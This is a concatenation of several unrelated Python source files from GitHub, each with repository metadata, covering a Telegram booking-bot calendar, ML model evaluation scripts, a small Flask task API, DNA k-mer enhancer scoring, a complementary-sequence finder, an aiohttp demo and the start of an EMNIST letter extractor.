    # current_date = datetime.datetime.now(tz_ulyanovsk)
    current_date = datetime.datetime.now()
    # ?
    # current_date += datetime.timedelta(hours=4)
    # When showing the current month, clamp `day` to today so earlier days
    # in this month are filtered out below.
    if month == current_date.month and year == current_date.year:
        month = current_date.month
        year = current_date.year
        day = current_date.day
    # print(c.formatyear(current_date.year))
    print_c = c.formatmonth(year, month)
    # time_service = service.time
    inline_calendar = InlineKeyboardMarkup(row_width=7)
    # "Previous month" arrow only when not looking at the current month.
    if (month != current_date.month and year == current_date.year) \
            or ((month != current_date.month or month == current_date.month)
                and year != current_date.year):
        if service:
            inline_calendar.add(InlineKeyboardButton('<', callback_data='month_previous_appointment'))
        else:
            if master_id:
                inline_calendar.add(InlineKeyboardButton('<',
                                                         callback_data=f'month_previous_del_{master.master_name}'))
            else:
                inline_calendar.add(InlineKeyboardButton('<', callback_data='month_previous_checks'))
    data['current_choice_month'] = month
    data['current_choice_year'] = year
    await state.update_data(data)
    # Header button: "<Month> <Year>" taken from formatmonth's first words.
    inline_calendar.insert(InlineKeyboardButton(f'{months.get(print_c.split()[0])} {print_c.split()[1]}',
                                                callback_data=' '))
    if service:
        inline_calendar.insert(InlineKeyboardButton('>', callback_data='month_next_appointment'))
    else:
        if master_id:
            inline_calendar.insert(InlineKeyboardButton('>', callback_data=f'month_next_del_{master.master_name}'))
        else:
            inline_calendar.insert(InlineKeyboardButton('>', callback_data='month_next_checks'))
    # Weekday header row (Mo..Su abbreviations mapped through `days`).
    for week_day in [item for item in print_c.split()][2:9]:
        if week_day == 'Mo':
            inline_calendar.add(InlineKeyboardButton(days.get(week_day), callback_data=days.get(week_day)))
            continue
        inline_calendar.insert(InlineKeyboardButton(days.get(week_day), callback_data=days.get(week_day)))
    for day_cal in [date for date in c.itermonthdays4(year, month)]:
        # Exclude other-month days, past days and weekends (Saturday, Sunday).
        if day_cal[2] == 0 \
                or day > day_cal[2] \
                or day_cal[2] in [date[0] for date
                                  in c.itermonthdays2(year, month)
                                  if date[1] in [5, 6]] \
                or day_cal[1] != month:
            inline_calendar.insert(InlineKeyboardButton(' ', callback_data=f'wrong_date'))
            continue
        # Days with an existing log entry are flagged with a '+' for masters.
        if is_it_for_master and str(day_cal) in all_date_logs:
            inline_calendar.insert(InlineKeyboardButton(f'{day_cal[2]} +',
                                                        callback_data=f'date_{day_cal}_{master.master_name}'))
        else:
            if master_id:
                inline_calendar.insert(InlineKeyboardButton(day_cal[2],
                                                            callback_data=f'date_{day_cal}_{master.master_name}'))
            else:
                inline_calendar.insert(InlineKeyboardButton(day_cal[2],
                                                            callback_data=f'date_{day_cal}'))
    # inline_calendar.add(InlineKeyboardButton('Отмена записи', callback_data='cancel_appointment'))
    if service:
        await response.answer(f'Ваше Фамилия и Имя: "{data.get("name_client")}". '
                              f'\nМастер: "{data.get("name_master")}"'
                              f'\nУслуга: "{service.name}"', reply_markup=inline_calendar)
    else:
        await response.answer(f'Выберите дату.', reply_markup=inline_calendar)
def get_key(d, value):
    """Return the first key in `d` whose value equals `value` (None if absent)."""
    return next((k for k, v in d.items() if v == value), None)
| Sanzensekai-mx/cosmetology_bot_example | utils/general_func.py | general_func.py | py | 9,053 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "utils.db_api.models.DBCommands",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "aiogram.types.InlineKeyboardMarkup",
"line_number": 26,
"usage_type": "call"
},
{
"api_name": "aiogram.types.InlineKeyboardButton",
"line_number": 34,
"usage_type": "... |
33918027336 | import hydra
import logging
import pandas as pd
from sklearn.model_selection import train_test_split
from sklearn.model_selection import cross_val_score, StratifiedShuffleSplit
from sklearn import metrics
from joblib import load
from transformers import pipeline
logger = logging.getLogger(__name__)
def evaluate_HGF_zero_shot(X_test, y_test):
# Topics and id correspondances
labels_str = {'code password log new': 0,
'printer print scan attached': 1,
'ticket follow': 2}
# Get zero-shot-classfier
classifier = pipeline('zero-shot-classification')
candidate_labels = list(labels_str.keys())
# Predict topics
pipeline_pred_complete = classifier(list(X_test.values), candidate_labels, hypothesis_template="This is probably a conversation on the topic of {}")
# Convert to id for scoring
pipeline_pred_id = [labels_str[pred['labels'][0]] for pred in pipeline_pred_complete]
logger.info(f'\n{metrics.classification_report(y_test, pipeline_pred_id)}')
logger.info(f'Confusion matrix:\n{metrics.confusion_matrix(y_test, pipeline_pred_id)}')
def evaluation(model, metric, cv, X_train, X_test, y_train, y_test):
# Traditional
predicted = model.predict(X_test)
logger.debug(model.predict(X_test))
logger.debug(X_test)
logger.info(f'\n{metrics.classification_report(y_test, predicted)}')
logger.info(f'Confusion matrix:\n{metrics.confusion_matrix(y_test, predicted)}')
# dict_metrics = metrics.classification_report(y_test, predicted, output_dict=True)
# Create cross validation splits, stratified
scores = cross_val_score(model, X_train, y_train, cv=cv, scoring=metric)
logger.info(f"CV SCORES: {scores}, mean {scores.mean()} and std {scores.std()}")
# return scores.mean(), scores.std(), dict_metrics['accuracy'], dict_metrics['weighted avg']['f1-score']
@hydra.main(config_path="../../conf", config_name="config")
def main(config):
# Get data, first message and topic
df_conv = pd.read_csv(config['first_message_topic_path'])
# Split data
X_train, X_test, y_train, y_test = train_test_split(
df_conv['first_msg_user'],
df_conv['topics_id'],
test_size=0.2,
random_state=config['seed'],
stratify=df_conv['topics_id'],
)
# Create cross validation splits
cv = StratifiedShuffleSplit(n_splits=5, random_state=config['seed'])
# Load models and evaluate them
clf_base = load(config['models_folder']+config['clf_base'])
logger.info('-----Evaluating cfl_base')
evaluation(clf_base, config['score_metric'], cv, X_train, X_test, y_train, y_test)
clf_HP_search = load(config['models_folder']+config['clf_HP_search'])
logger.info('-----Evaluating cfl_base_HP_search')
evaluation(clf_HP_search, config['score_metric'], cv, X_train, X_test, y_train, y_test)
# Evaluate HugginFace zero-shot
evaluate_HGF_zero_shot(X_test, y_test)
if __name__ == "__main__":
main() | Vachonni/ChatbotWiz | src/modelling/evaluate.py | evaluate.py | py | 3,005 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "logging.getLogger",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "transformers.pipeline",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "sklearn.metrics.classification_report",
"line_number": 31,
"usage_type": "call"
},
{
"api... |
32134064982 | #GET() - Is used to request data from a specified resource. when you access a websites page your
#browser makes a get request to your api. The api will return the front end that is displayed
#in the browser
#for example - get request is printing "bye world" for us in the local host port no. 8000.
#POST() - is used to send data to the server to create or update a resource.
#for example - changing the password of an account
#PUT() - is also used to send data to the server to create or update a resource,
#but unlike POST it is idempotent: repeating the same PUT request leaves only one
#copy of the resource. for example - creating or replacing a profile at a known URL
#DELETE() - is used to delete a resource.
#for example - to delete an account
from flask import Flask, jsonify, request
app = Flask(__name__)
# In-memory task store; lost on restart. sample2 below assumes it is
# non-empty when computing the next id.
tasks = [
    {
        'id': 1,
        'title': 'Buy groceries',
        'description': 'milk, cheese, vegies, fruits',
        'done': False
    },
    {
        'id': 2,
        'title': 'learning python',
        'description': 'in whitehatjr',
        'done': False
    }
]
@app.route("/ add-data", methods = ["POST()"])
def sample2():
if not request.json:
return jsonify({
"status" : "error",
"message" : "Please Provide The Data"
}, 400)
task={
'id': tasks[-1]['id']+ 1,
'title': request.json['title'],
'description': request.json.get('description', ""),
'done': False
}
tasks.append(task)
return jsonify({
"status": "Success!!",
"message": "The task is added successfully!"
})
@app.route("/get-data")
def get_task():
return jsonify({
"data": tasks,
})
@app.route("/")
def sample():
return("bye world")
if (__name__ == "__main__"):
app.run(debug=True, port=8000)
| manasvijain20/flask-project | app.py | app.py | py | 1,849 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "flask.Flask",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "flask.request.json",
"line_number": 34,
"usage_type": "attribute"
},
{
"api_name": "flask.request",
"line_number": 34,
"usage_type": "name"
},
{
"api_name": "flask.jsonify",
... |
31128572577 | #!/usr/bin/env python
import lzma
import pickle
from Bio import SeqIO
import os
import numpy as np
import sys
import matplotlib.pyplot as plt
from sklearn.feature_extraction.text import CountVectorizer as Cvec
from itertools import product
from scipy.stats import poisson
from scipy.special import softmax
# Pre-computed background 6-mer vectors (forward and reverse-complement)
# for D. melanogaster and D. virilis, each reshaped to one row of
# 4**6 = 4096 k-mer entries.
dmel_bkg = np.load('dmel_bkg.npz.npy').reshape(1, 4096)
dmel_bkg_rev = np.load('dmel_bkg_revcomp.npz.npy').reshape(1, 4096)
dvir_bkg = np.load('dvir_bkg.npz.npy').reshape(1, 4096)
dvir_bkg_rev = np.load('dvir_bkg_revcomp.npz.npy').reshape(1, 4096)
def get_kmers(seq, k=6):
    '''
    Slide a window of width k across a DNA sequence and collect the
    lowercase k-mers (empty list when len(seq) < k).
    '''
    n_windows = len(seq) - k + 1
    return [seq[i:i + k].lower() for i in range(n_windows)]
def tokenizer(kmers, single_seq=False):
    '''
    Count-vectorise a k-mer spectrum against the fixed vocabulary of all
    4096 6-mers; returns a dense numpy array of counts (one row per input
    document, or one row total when single_seq=True).
    '''
    # Fixed vocabulary: every 6-mer over the DNA alphabet, in product order.
    table = Cvec(vocabulary = [''.join(i) for i in product('acgt', repeat = 6)])
    if single_seq:
        # Treat the whole k-mer list as a single space-joined document.
        table.fit([' '.join(kmers)])
        rv = table.transform([' '.join(kmers)]).toarray()
    else:
        # One document per entry in `kmers`.
        table.fit(kmers)
        rv = table.transform(kmers).toarray()
    return rv
def compute_kmer_array(fasta_file, k = 6, window_size = 500, stride = 50, return_array = False):
    '''
    Slide a window over every record of ``fasta_file`` and pickle one
    hexamer count matrix per record into <basename>.xz.

    Each record is cut into windows of ``window_size`` nt every ``stride``
    nt; windows that would run past the end of the sequence are dropped.
    A <basename>.idTables pickle maps record index -> (id, length).
    NOTE(review): with return_array=True only the FIRST record's matrix is
    returned and the .idTables file is never written -- confirm intended.
    '''
    file_basename = os.path.splitext(fasta_file)[0]
    out_name = file_basename + '.xz'
    region_keys = dict()
    # "ab" appends, so re-running accumulates pickles in the same archive.
    with lzma.open(out_name, "ab") as F:
        with open(fasta_file, 'rt') as f:
            seqs = SeqIO.parse(f, 'fasta')
            for index, seq in enumerate(seqs):
                seq_name, seq_length, seq_string = seq.id, seq.seq.__len__(), seq.seq.__str__()
                region_keys[index] = (seq_name, seq_length)
                rv = []
                for L in range(0, seq_length, stride):
                    print(seq_name)
                    if (L + window_size < seq_length):
                        r = seq_string[L:L+window_size]
                        r = get_kmers(r, k = k)
                        rv.append(r)
                # Join each window's k-mers into one space-separated document
                # so the vectorizer counts one matrix row per window.
                for i in range (len(rv)):
                    rv [i] = ' '.join(rv[i])
                x = tokenizer(rv)
                if return_array:
                    return x
                else:
                    pickle.dump(x, F)
    id_table = open(file_basename + '.idTables', 'bw')
    pickle.dump(region_keys, id_table)
    id_table.close()
def calc_poisson_cdf_common(kmer_table, mu_kmer_array):
    """Upper-tail Poisson probability P(X >= count) for every count.

    ``mu_kmer_array`` (1 row) is tiled to the table's shape; entries whose
    count is zero are assigned probability 1.
    """
    n_rows = kmer_table.shape[0]
    mu = np.tile(mu_kmer_array, (n_rows, 1))
    survival = 1 - poisson.cdf(kmer_table - 1, mu)
    return np.where(kmer_table > 0, survival, 1)
def calc_poisson_cdf_all(kmer_table, mu_kmer_array):
    """Lower-tail Poisson probability P(X <= count) for every count."""
    n_rows = kmer_table.shape[0]
    tiled_mu = np.tile(mu_kmer_array, (n_rows, 1))
    return poisson.cdf(kmer_table, tiled_mu)
def test_func(id_tables = 'rregions.idTables', enhancer_dna = 'annot_Ubiquitous_enhancers_S10_hg38.fa'
        , regions_pickle = 'rregions.pickle', k = 6
        , dmel_bkg = None, dvir_bkg = None, dmel_bkg_rev = None):
    '''
    Score each enhancer (and its reverse complement) against every sliding
    window of its orthologous region and append the best-scoring window to
    predicted_enhancers.bed.

    id_tables      : pickle mapping region index -> (region id, length)
    enhancer_dna   : FASTA whose record ids embed "<x>_<region id>_..."
    regions_pickle : lzma archive of per-region window k-mer count matrices
    dmel_bkg / dvir_bkg / dmel_bkg_rev : 1 x 4096 background vectors,
        scaled below to expected counts per 500 nt window.
    '''
    # Convert background frequencies into expected hexamer counts for a
    # window that holds (500 - k + 1) k-mers.
    dmel_bkg = dmel_bkg * (500 - k + 1)
    dmel_bkg_rev = dmel_bkg_rev * (500 - k + 1)
    dvir_bkg = dvir_bkg * (500 - k + 1)
    basename = os.path.splitext(regions_pickle)[0]
    # NOTE(review): out_file is computed but never used -- output always
    # goes to the hard-coded predicted_enhancers.bed below.
    out_file = basename + '.bed'
    SO = open('predicted_enhancers.bed', 'at')
    with open(id_tables, 'br') as F:
        regions_keys = pickle.load(F)
    with open(enhancer_dna, 'rt') as F:
        bio_seqs = list(SeqIO.parse(F, 'fasta'))
    with lzma.open(regions_pickle, 'rb') as F:
        for i,j in regions_keys.items():
            seq_id = j[0]
            seq_length = j[1]
            # Matrices were dumped in region order: one load per region.
            rv = pickle.load(F)
            # Enhancers whose id's second "_" field names this region.
            tmp = [seq for seq in bio_seqs if seq.id.split("_")[1] == seq_id]
            # Region ids look like "chrom:start-end".
            start_pos = int(seq_id.split(':')[1].split('-')[0])
            chrom = seq_id.split(':')[0]
            for seq in tmp:
                rc = seq.reverse_complement(id = True, name = True, description = True).seq.__str__()
                x = seq.seq.__str__()
                x = get_kmers(x, k = 6)
                x = tokenizer(x, single_seq = True)
                rc = get_kmers(rc, k = 6)
                rc = tokenizer(rc, single_seq = True)
                # Hexamer counts shared between enhancer and each window.
                x_minima = np.minimum(rv, x)
                rc_minima = np.minimum(rv, rc)
                # P(count >= shared) under each species' background.
                poisson_scores_x = calc_poisson_cdf_common(x_minima, dmel_bkg)
                poisson_scores_rc = calc_poisson_cdf_common(rc_minima, dmel_bkg_rev)
                # poisson_scores_region_x = calc_poisson_cdf_common(x_minima, dvir_bkg)
                # poisson_scores_region_rc = calc_poisson_cdf_common(rc_minima, dvir_bkg)
                # poisson_scores_region = calc_poisson_cdf_common(rv, dvir_bkg)
                poisson_scores_region_x = calc_poisson_cdf_common(x_minima, dvir_bkg)
                poisson_scores_region_rc = calc_poisson_cdf_common(rc_minima, dvir_bkg)
                ss_x = (poisson_scores_region_x) * (poisson_scores_x)
                ss_rc = (poisson_scores_region_rc) * (poisson_scores_rc)
                # Full-count CDFs feed a dissimilarity penalty below.
                poisson_scores_rc_all = calc_poisson_cdf_all(rc, dmel_bkg_rev)
                poisson_scores_x_all = calc_poisson_cdf_all(x, dmel_bkg)
                poisson_scores_rv_all = calc_poisson_cdf_all(rv, dvir_bkg)
                diff_x = np.abs(poisson_scores_x_all - poisson_scores_rv_all)
                diff_x = np.sum(diff_x, axis = 1)/4096
                diff_rc = np.abs(poisson_scores_rc_all - poisson_scores_rv_all)
                diff_rc = np.sum(diff_rc, axis = 1)/4096
                out_x = np.sum(1 - ss_x, axis = 1)/4096
                out_rc = np.sum(1 - ss_rc, axis = 1)/4096
                # Final per-window score: similarity minus a small penalty.
                score_x = out_x - (diff_x * 0.1)
                score_rc = out_rc - (diff_rc * 0.1)
                # NOTE(review): overwritten for every enhancer -- only the
                # last enhancer's score tracks survive.
                np.savetxt('fw_scores', score_x)
                np.savetxt('rv_scores', score_rc)
                # score_x = softmax(out_x - diff_x)
                # score_rc = softmax(out_rc - diff_rc)
                minima_x = np.nanargmax(score_x)
                minima_rc = np.nanargmax(score_rc)
                # NOTE(review): plt.show() blocks until the plot window is
                # closed for every enhancer -- awkward for batch runs.
                plt.plot(score_x)
                plt.plot(score_rc, 'r--')
                plt.show()
                # Keep whichever strand scored best.
                if (score_x[minima_x] >= score_rc[minima_rc]):
                    minima = minima_x
                    out_score = score_x[minima_x]
                else:
                    minima = minima_rc
                    out_score = score_rc[minima_rc]
                # Windows advance 50 nt and span 500 nt (see compute_kmer_array).
                ortho_position = (chrom + '\t' + f'{start_pos + minima*50}' + '\t' + f'{start_pos + minima*50 + 500}' + '\t' + f'{out_score}')
                enhancer_position = '_'.join(seq.id.split('_')[0:2])
                out_write = ortho_position + '\t' + enhancer_position + '\t' f'{minima}'
                SO.write(out_write + '\n')
    SO.close()
if __name__ == "__main__":
compute_kmer_array(sys.argv[1])
basename = os.path.splitext(sys.argv[1])[0]
test_func(regions_pickle = basename + '.xz', id_tables = basename + '.idTables', dmel_bkg = dmel_bkg, dvir_bkg = dvir_bkg, dmel_bkg_rev=dmel_bkg_rev)
| laiker96/alfree_enhancer_detection | process_fasta_vectorization.py | process_fasta_vectorization.py | py | 7,352 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "numpy.load",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "numpy.load",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "numpy.load",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "numpy.load",
"line_number": 19,
... |
44221187152 | import argparse
import logging
import pdb
import sys
import traceback
from typing import Text, Optional
import torch
from pyprojroot import here as project_root
import os
# Make the repository root importable so the project-local packages resolve.
sys.path.insert(0, str(project_root()))
from context_model_pretrain import make_model
from data.fsmol_task import FSMolTaskSample
from data.multitask import get_multitask_inference_batcher
from models.abstract_torch_fsmol_model import eval_context_model
from utils.metrics import BinaryEvalMetrics
from utils.test_utils import add_eval_cli_args, eval_model, set_up_test_run
from utils.logging import prefix_log_msgs, set_up_logging
# Module-level logger named after this module's import path.
logger = logging.getLogger(__name__)


"""
"""
def parse_command_line():
    """Build and parse the CLI arguments for evaluating a trained context
    model on the downloaded task splits."""
    parser = argparse.ArgumentParser(
        description="Test finetuning a GNN Multitask model on tasks.",
        formatter_class=argparse.ArgumentDefaultsHelpFormatter,
    )
    parser.add_argument("--metric", default='None')
    parser.add_argument("--model_size", default='base')
    parser.add_argument(
        "--dropout",
        type=float,
        default=0.0,
        help="Dropout for molecular Transformer.",
    )
    parser.add_argument(
        "--attention_dropout",
        type=float,
        default=0.0,
        help="Attention Dropout for molecular Transformer.",
    )
    parser.add_argument(
        "TRAINED_MODEL",
        type=str,
        help="File to load model from (determines model architecture).",
    )
    # Shared evaluation flags (--train-sizes, --num-runs, --seed, ...).
    add_eval_cli_args(parser)
    parser.add_argument(
        "--batch_size",
        type=int,
        default=128,
        help="Number of molecules per batch.",
    )
    parser.add_argument(
        "--use-fresh-param-init",
        action="store_true",
        help="Do not use trained weights, but start from a fresh, random initialisation.",
    )
    parser.add_argument(
        "--learning-rate",
        type=float,
        default=0.00005,
        help="Learning rate for shared model components.",
    )
    parser.add_argument(
        "--task-specific-lr",
        type=float,
        default=0.0001,
        help="Learning rate for shared model components.",
    )
    parser.add_argument("--model_type", default='MoleculeTransformer')
    parser.add_argument("--model_path", default='v2_mlcm/m1/best_model.pt')
    # BUG FIX: argparse's type=bool is a trap -- bool("False") is True, so
    # any non-empty value enabled the flag.  Parse the string explicitly;
    # "--use_embedding True" keeps working and "False"/"0"/"no" now disable.
    parser.add_argument("--use_embedding",
                        type=lambda s: str(s).lower() in ("true", "1", "yes"),
                        default=False)
    parser.add_argument("--cuda", type=int, default=5)
    return parser.parse_args()
def main():
    """Load a trained context model and evaluate it on the sampled task
    splits produced by set_up_test_run, writing results to the model dir."""
    args = parse_command_line()
    out_dir, dataset = set_up_test_run("Multitask", args, torch=True)

    # Recreate the outdir.
    # out_dir = os.path.join(args.save_dir, f'{args.model_path.split("/")[2]}_{args.train_sizes[0]}')
    # os.makedirs(out_dir, exist_ok=True)

    # overwrite outdir to be the model dir: save-dir is now irrelevant.
    out_dir = '/'.join(args.model_path.split('/')[:-1])
    set_up_logging(os.path.join(out_dir, f"eval_run.log"))

    device = torch.device(f"cuda:{args.cuda}" if torch.cuda.is_available() else "cpu")
    # model = make_model('base', args.model_type, device=device)
    model = make_model(args, model_size=args.model_size, model_type=args.model_type, device=device)
    # model.load_state_dict(torch.load(
    #     '/lfs/local/0/fifty/context_modeling/v3/ContextTransformer_v3_base_5e-05_0.0_0.0_100_256_ContextTransformer_v3_2023-04-20_13-51-50/best_model.pt'))
    # model.load_state_dict(torch.load(
    #     '/lfs/local/0/fifty/context_modeling/v2_full_dim/ContextTransformer_v2_base_5e-05_0.0_0.0_100_256_ContextTransformer_v2_2023-04-22_17-45-08/best_model.pt'))
    # map_location lets a GPU-trained checkpoint load onto the chosen device.
    model.load_state_dict(torch.load(args.model_path, map_location=device))
    # Identity-style embedding: evaluation consumes raw node features.
    embedding_model = lambda x: x.node_features  # pass through or something.
    model.to(device)

    # Per-task evaluation callback handed to eval_model below.
    def test_model_fn(
        task_sample: FSMolTaskSample, temp_out_folder: str, seed: int
    ) -> BinaryEvalMetrics:
        return eval_context_model(
            model=model,
            embedding_model=embedding_model,
            task_sample=task_sample,
            batcher=get_multitask_inference_batcher(max_num_graphs=args.batch_size, device=device),
            learning_rate=args.learning_rate,
            task_specific_learning_rate=args.task_specific_lr,
            metric_to_use="avg_precision",
            seed=seed,
            quiet=True,
            device=device,
        )

    eval_model(
        test_model_fn=test_model_fn,
        dataset=dataset,
        train_set_sample_sizes=args.train_sizes,
        out_dir=out_dir,
        num_samples=args.num_runs,
        valid_size_or_ratio=0.,
        seed=args.seed,
    )
if __name__ == "__main__":
try:
main()
except Exception:
_, value, tb = sys.exc_info()
traceback.print_exc()
pdb.post_mortem(tb)
| cfifty/CAMP | context_modeling_test.py | context_modeling_test.py | py | 4,420 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "sys.path.insert",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "sys.path",
"line_number": 12,
"usage_type": "attribute"
},
{
"api_name": "pyprojroot.here",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "logging.getLogger",
... |
21521159472 | #!/usr/bin/env python3
import argparse
"""
Script to find complementary subsequences inside of a main sequence.
Copyright 2020 Margherita Maria Ferrari.
This file is part of ComplSeqUtils.
ComplSeqUtils is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
ComplSeqUtils is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with ComplSeqUtils. If not, see <http://www.gnu.org/licenses/>.
"""
class ComplSeqUtils:
    """Locate reverse-complementary subsequences within a DNA/RNA sequence."""

    # Watson-Crick base pairing for DNA.
    MAPPING_DNA = {'A': ('T',),
                   'T': ('A',),
                   'C': ('G',),
                   'G': ('C',)
                   }
    # RNA pairing; U and G additionally allow G-U wobble pairs, so a base
    # can have more than one partner.
    MAPPING_RNA = {'A': ('U',),
                   'U': ('A', 'G'),
                   'C': ('G',),
                   'G': ('C', 'U')
                   }
    SEQ_TYPE_MAPPING = {'dna': MAPPING_DNA, 'rna': MAPPING_RNA}

    @classmethod
    def __get_complementary_sequence(cls, sequence, seq_type='rna'):
        """Return every complementary sequence of the reversed ``sequence``.

        Wobble pairs can map one base to two partners, so the result is a
        list with one entry per combination of partner choices.

        Raises AssertionError for characters absent from the mapping.
        """
        ret = list()
        mapping = cls.SEQ_TYPE_MAPPING.get(seq_type.lower(), dict())
        for c in sequence[::-1]:
            if c.upper() not in mapping.keys():
                raise AssertionError('Unknown char or mapping not found for "' + c.upper() + '"')
            # BUG FIX: the fallback default used to be the *type* ``list``
            # rather than an empty sequence; since the membership check
            # above guarantees the key exists, index the mapping directly.
            compl = mapping[c.upper()]
            if len(compl) > 0:
                if len(ret) == 0:
                    # First base: seed one partial result per partner.
                    for i in compl:
                        ret.append(i)
                else:
                    # Extend every partial result with the first partner and
                    # branch new results for any additional (wobble) partner.
                    for i in range(len(ret)):
                        tmp = ret[i]
                        ret[i] += compl[0]
                        for j in range(1, len(compl)):
                            ret.append(tmp + compl[j])
        return ret

    @classmethod
    def __find(cls, sequence, complementary, num_chars):
        """Return 1-based 'start-end' strings for every exact occurrence of
        ``complementary`` within ``sequence``."""
        ret = list()
        for start in range(0, len(sequence) - num_chars + 1):
            end = start + num_chars
            if complementary == sequence[start:end]:
                ret.append(str(start + 1) + '-' + str(end))
        return ret

    @classmethod
    def get_args(cls):
        """Build and parse the command-line arguments."""
        parser = argparse.ArgumentParser(description='Complementary sequences utils')
        parser.add_argument('-i', '--input-file', metavar='IN_FILE', type=str, required=True, help='Input file')
        parser.add_argument('-o', '--output-file', metavar='OUT_FILE', type=str, required=False, help='Output file',
                            default='output.txt')
        parser.add_argument('-n', '--num-chars', metavar='N', type=int, required=True,
                            help='Number of characters in subsequence')
        parser.add_argument('-t', '--seq-type', type=str, required=True, choices=('dna', 'rna'), default='rna',
                            help='Sequence type')
        return parser.parse_args()

    @classmethod
    def find_complementary_sequences(cls, num_chars=0, input_file=None, seq_type='rna', output_file='out.txt'):
        """Scan the sequence in ``input_file`` for subsequences of length
        ``num_chars`` whose reverse complements also occur in the sequence,
        writing a human-readable report to ``output_file``.

        Raises AssertionError when a required argument is missing/invalid.
        """
        if not input_file or not output_file or num_chars <= 0:
            raise AssertionError('You must specify input file, output file and the character number')

        # Only the first line of the input file is analysed.
        with open(input_file, 'r') as fin:
            sequence = fin.readline().strip().upper()

        complementary_sequences = dict()
        for start in range(0, len(sequence) - num_chars + 1):
            end = start + num_chars
            subsequence = sequence[start:end]
            if subsequence in complementary_sequences.keys():
                # Already analysed: only record the extra occurrence.
                entry = complementary_sequences.get(subsequence, dict())
                entry['positions'] = entry.get('positions', '') + ', ' + str(start + 1) + '-' + str(end)
                continue

            complementary = cls.__get_complementary_sequence(subsequence, seq_type)
            for c in complementary:
                res = cls.__find(sequence, c, num_chars)
                if len(res) > 0:
                    # Idiom fix: join replaces the old concatenate-and-trim loop.
                    results = ', '.join(res)
                    if complementary_sequences.get(subsequence, None) is None:
                        complementary_sequences[subsequence] = {'positions': str(start + 1) + '-' + str(end),
                                                                'set': ', '.join(map(str, complementary)),
                                                                'items': [{'complementary': c,
                                                                           'num_results': len(res),
                                                                           'results': res,
                                                                           'locations': results
                                                                           }]
                                                                }
                    else:
                        complementary_sequences[subsequence]['items'].append({'complementary': c,
                                                                             'num_results': len(res),
                                                                             'results': res,
                                                                             'locations': results
                                                                             })

        with open(output_file, 'w') as fout:
            fout.write('Sequence: ' + sequence + '\n')
            fout.write('Subsequence Length: ' + str(num_chars) + '\n')
            for k, v in complementary_sequences.items():
                fout.write('\nSubsequence: ' + k + '\n')
                fout.write('Positions: ' + v.get('positions', '') + '\n')
                fout.write('Set of complementary sequences: ' + v.get('set', '') + '\n')
                for item in v.get('items', list()):
                    fout.write('Complementary: ' + item.get('complementary', '') + '\n')
                    fout.write('Locations: ' + item.get('locations', '') + '\n')
if __name__ == '__main__':
    cli_args = vars(ComplSeqUtils.get_args())
    ComplSeqUtils.find_complementary_sequences(cli_args.get('num_chars', 0),
                                               cli_args.get('input_file', None),
                                               cli_args.get('seq_type', 'rna'),
                                               cli_args.get('output_file', None))
| mmferrari/ComplSeqUtils | compl_seq_utils.py | compl_seq_utils.py | py | 6,687 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "argparse.ArgumentParser",
"line_number": 81,
"usage_type": "call"
}
] |
12388878470 | # asyncio实现了tcp udp ssl等协议,aiohttp是基于asyncio实现的http框架
import asyncio
from aiohttp import web
# 编写一个http服务器处理以下url
# / - 首页返回 b'<h1>Index</h1>';
# /hello/{name} - 根据 URL 参数返回文本 hello, %s!。
async def index(request):
    """Handler for '/': replies with a static HTML heading."""
    await asyncio.sleep(0.5)  # simulated latency; never blocks the event loop
    payload = b'<h1>index</h1>'
    return web.Response(body=payload)
async def hello(request):
    """Handler for '/hello/{name}': greets the URL-matched name."""
    await asyncio.sleep(0.5)
    name = request.match_info['name']
    text = '<h1>hello,%s!</h1>' % name
    return web.Response(body=text.encode('utf-8'))
async def init(loop):
    """Build the aiohttp Application, register the two routes and start a
    TCP server on localhost:8000.

    NOTE(review): Application(loop=...) and make_handler() are deprecated
    in modern aiohttp (web.run_app is preferred) -- kept for compatibility
    with the aiohttp version this was written against.
    """
    app = web.Application(loop=loop)
    app.router.add_route('GET', '/', index)
    app.router.add_route('GET', '/hello/{name}', hello)
    # Create the TCP server.
    srv = await loop.create_server(app.make_handler(), '127.0.0.1', 8000)
    print('server started at http://localhost:8000...')
    return srv
# Set up the server inside the event loop, then serve until interrupted.
loop = asyncio.get_event_loop()
loop.run_until_complete(init(loop))
loop.run_forever()
| chikchikL/pythonLearning | aiohttp_demo.py | aiohttp_demo.py | py | 969 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "asyncio.sleep",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "aiohttp.web.Response",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "aiohttp.web",
"line_number": 11,
"usage_type": "name"
},
{
"api_name": "asyncio.sleep",
"l... |
38467207386 | import cv2
import numpy as np
import keras
# ASCII codes of the 62 EMNIST class labels: digits 0-9 (48-57),
# uppercase A-Z (65-90) and lowercase a-z (97-122).
emnist_labels = [48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 122]
def letters_extract(image_file: str, out_size=28):
    """Segment individual characters out of ``image_file``.

    Returns a list of (x, width, crop) tuples sorted left-to-right, where
    ``crop`` is the letter pasted onto a white square (to preserve aspect)
    and resized to ``out_size`` x ``out_size``.
    """
    img = cv2.imread(image_file)
    gray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)
